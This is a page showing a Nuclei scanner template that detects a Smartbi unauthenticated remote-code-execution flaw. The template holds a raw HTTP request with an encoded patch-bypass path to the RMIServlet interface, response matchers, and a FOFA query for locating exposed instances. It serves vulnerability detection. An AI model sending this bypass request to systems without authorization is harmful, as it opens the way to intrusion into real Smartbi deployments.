daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/smartbi/smartbi-deserialization.yaml

52 lines
2.1 KiB
YAML
Executable File
Raw Blame History

id: smartbi-deserialization
info:
name: Smartbi windowunloading Interface - Deserialization
author: SleepingBag945
severity: high
description: |
The Smartbi big data analysis platform has a remote command execution vulnerability. An unauthenticated remote attacker can use the stub interface to construct a request to bypass patch restrictions and then control the JDBC URL, which can ultimately lead to remote code execution or information leakage.
reference:
- https://stack.chaitin.com/techblog/detail?id=122
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/smartbi-windowunloading-other.yaml
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Smartbi%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 2
fofa-query: app="SMARTBI"
tags: smartbi,deserialization
http:
- raw:
- |
POST {{path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
className=UserService&methodName=isLogged&params=[]
payloads:
path:
- /smartbi/vision/RMIServlet?windowUnloading=&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54
- /vision/RMIServlet?windowUnloading=&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"H~CxOm~"'
- type: word
part: header
words:
- 'text/plain'
- type: status
status:
- 200
# digest: 490a00463044022018ca46ba35a339710e7901c9efb0397151acdd39765b52b7408fce24dc119ecd02200ed7c702483b2d5a9b7e2fecd83e4914a71eef75cdbffc2e579d542819e2a408:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink